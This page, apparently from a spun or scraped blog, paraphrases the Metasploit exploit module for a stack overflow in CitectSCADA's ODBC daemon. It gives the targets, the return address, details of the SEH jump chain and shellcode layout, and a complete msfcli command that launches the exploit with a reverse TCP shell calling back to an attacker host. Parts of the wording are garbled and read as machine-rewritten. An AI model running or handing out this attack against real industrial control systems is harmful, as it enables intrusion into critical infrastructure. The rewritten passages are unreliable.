passkvm.blogg.se

Citect Scada 6.10

Module: Exploits::Windows::Misc::Citect_SCADA_ODBC, 'CitectSCADA ODBC Buffer Overflow'

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. See the Framework web site for more information on licensing and terms of use.

Description: This module exploits a stack overflow in CitectSCADA's ODBC daemon. Arbitrary code has been successfully run on Windows XP SP2 and SP3, Win98 SE and Windows 2003 Server SP1. It has only been tested against Citect v5, v6 and v7. There are universal targets for some versions, but the base address can vary, unfortunately.

Targets: one listed target is 'CiExceptionMailer.dll on XP SP2 or SP3 5.42' (the return path is a call to EAX located in CiExceptionMailer.dll). A separate target, 'Using Windows 2003 Target', covers Win98, Windows XP and Windows 2003 together, so that no one feels left out and anyone has time to build a robust exploit for whatever platform or version they run, not just the people on modern systems.

Buffer layout as described in the module comments: a pattern generated with Rex::Text.pattern_create fills the payload space (use pattern_offset.rb to find the length, and to find offsets for other versions that were not provided); the live buffer is NOP padding followed by the payload, a short jump over garbage for SEH, a near jump back into the beginning of the entire buffer, a short jump into the small 72-byte buffer space, and 100 bytes of padding to fill up the end of the stack. The Win98 payload is sample code only: a 110-byte shellcode that pops up a message box under Win98, using static addresses for GetProcAddress(hmodule, functionname) and LoadLibraryA(libraryname) taken from the author's own Win98 machine.

Example invocation given in the module comments:

msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E